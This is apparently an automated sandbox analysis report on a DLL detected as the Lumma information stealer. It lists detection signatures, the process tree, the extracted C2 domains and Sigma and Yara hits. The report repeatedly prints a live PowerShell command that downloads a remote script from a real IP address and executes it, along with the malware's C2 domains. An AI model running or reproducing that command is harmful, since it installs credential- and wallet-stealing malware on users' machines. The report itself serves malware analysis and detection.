
Windows Analysis Report
iviewers.dll

Overview

General Information

Sample name: iviewers.dll
Analysis ID: 1580147
MD5: 021b791221db8fd3d93875f0a38ba5ef
SHA1: 505389236008ff05d84ef543566355aca2b3eb61
SHA256: 480d586ae595a2f7a47c20aee500758b03a596837b073ede049920d50fb24a05
Tags: dll, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Sigma detected: PowerShell Download and Execution Cradles
Suspicious execution chain found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7652 cmdline: loaddll32.exe "C:\Users\user\Desktop\iviewers.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7700 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7744 cmdline: rundll32.exe "C:\Users\user\Desktop\iviewers.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • csc.exe (PID: 7364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\shgzzqqc\shgzzqqc.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cvtres.exe (PID: 7060 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6C65.tmp" "c:\Users\user\AppData\Local\Temp\shgzzqqc\CSC104EE36483A04EF7B85B7643AE3701F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • powershell.exe (PID: 5656 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • csc.exe (PID: 3700 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pejlabp5\pejlabp5.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
            • cvtres.exe (PID: 1280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES83D5.tmp" "c:\Users\user\AppData\Local\Temp\pejlabp5\CSCDF701219C1C48818E6CA425D3E8BAB7.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
          • RegAsm.exe (PID: 4132 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • regsvr32.exe (PID: 7720 cmdline: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)
      • csc.exe (PID: 7892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 7956 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES61E6.tmp" "c:\Users\user\AppData\Local\Temp\snjgawjs\CSC3AE61AA7D3846E6BE99F6A92C13265.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • powershell.exe (PID: 8068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • csc.exe (PID: 3228 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ljtzeyvh\ljtzeyvh.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 1036 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7C53.tmp" "c:\Users\user\AppData\Local\Temp\ljtzeyvh\CSC85D6A8B45C74774986DA7C6AC7246BE.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • RegAsm.exe (PID: 2080 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
        • RegAsm.exe (PID: 2288 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • rundll32.exe (PID: 7736 cmdline: rundll32.exe C:\Users\user\Desktop\iviewers.dll,DllRegisterServer MD5: 889B99C52A60DD49227C5E485A016679)
      • csc.exe (PID: 7972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zhytdsxg\zhytdsxg.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 8048 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES63AB.tmp" "c:\Users\user\AppData\Local\Temp\zhytdsxg\CSC3C5171C2F0D346F28B74AD359FA9163B.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • powershell.exe (PID: 7228 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • csc.exe (PID: 5508 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkky4heb\tkky4heb.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 1568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7CE0.tmp" "c:\Users\user\AppData\Local\Temp\tkky4heb\CSC9A9BD2EDD89B4875B92A5CEF8AA9766.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • RegAsm.exe (PID: 4152 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • csc.exe (PID: 7576 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • cvtres.exe (PID: 6052 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7946.tmp" "c:\Users\user\AppData\Local\Temp\ceo01y5g\CSC7CE9657BAB74596AF1C43C93161D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • powershell.exe (PID: 3352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 4640 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rcv5n2si\rcv5n2si.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 4568 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9337.tmp" "c:\Users\user\AppData\Local\Temp\rcv5n2si\CSC2F361128F45F4F0A9752D6455878CB1F.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • RegAsm.exe (PID: 4936 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 3800 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • RegAsm.exe (PID: 4352 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["rapeflowwj.lat", "crosshuaht.lat", "volcanoyev.click", "energyaffai.lat", "aspecteirs.lat", "necklacebudi.lat", "grannyejh.lat", "sustainskelet.lat", "discokeyus.lat"], "Build id": "VC6Dfm--Loader2"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 8068 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
Process Memory Space: powershell.exe PID: 8068 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
  • 0x73500:$b2: ::FromBase64String(
  • 0x7353c:$b2: ::FromBase64String(
  • 0x73578:$b2: ::FromBase64String(
  • 0xdb632:$b2: ::FromBase64String(
  • 0xdb66e:$b2: ::FromBase64String(
  • 0xdb6aa:$b2: ::FromBase64String(
  • 0xdde16:$b2: ::FromBase64String(
  • 0xdde52:$b2: ::FromBase64String(
  • 0xdde8e:$b2: ::FromBase64String(
  • 0x10df92:$b2: ::FromBase64String(
  • 0x10dfce:$b2: ::FromBase64String(
  • 0x10e00a:$b2: ::FromBase64String(
  • 0xb25a:$s1: -join
  • 0xd5ac:$s1: -join
  • 0x5eb36:$s1: -join
  • 0x816c3:$s1: -join
  • 0x8e798:$s1: -join
  • 0x91b6a:$s1: -join
  • 0x9221c:$s1: -join
  • 0x93d0d:$s1: -join
  • 0x95f13:$s1: -join
Process Memory Space: powershell.exe PID: 7228 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
Process Memory Space: powershell.exe PID: 7228 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
  • 0x33baf:$b2: ::FromBase64String(
  • 0x33beb:$b2: ::FromBase64String(
  • 0x33c27:$b2: ::FromBase64String(
  • 0x4178e:$b2: ::FromBase64String(
  • 0x417ca:$b2: ::FromBase64String(
  • 0x41806:$b2: ::FromBase64String(
  • 0xbd5af:$b2: ::FromBase64String(
  • 0xbd5eb:$b2: ::FromBase64String(
  • 0xbd627:$b2: ::FromBase64String(
  • 0xdf0e0:$s1: -join
  • 0xed629:$s1: -join
  • 0xfa0ab:$s1: -join
  • 0x10b95c:$s1: -join
  • 0x10c10e:$s1: -join
  • 0x19002f:$s1: -join
  • 0x19d104:$s1: -join
  • 0x1a04d6:$s1: -join
  • 0x1a0b88:$s1: -join
  • 0x1a2679:$s1: -join
  • 0x1a487f:$s1: -join
  • 0x1a50a6:$s1: -join
Process Memory Space: powershell.exe PID: 5656 | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |

System Summary

Source: Process started; Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", ProcessId: 7892, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\loaddll32.exe, ProcessId: 7652, TargetFilename: C:\Users\user\AppData\Local\Temp\ceo01y5g\ceo01y5g.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.44.131/infopage/ybfh.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex", ProcessId: 8068, ProcessName: powershell.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: regsvr32.exe /s C:\Users\user\Desktop\iviewers.dll, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 7720, ParentProcessName: regsvr32.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\snjgawjs\snjgawjs.cmdline", ProcessId: 7892, ProcessName: csc.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-24T02:18:20.445540+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 172.67.195.241 | 443 | TCP
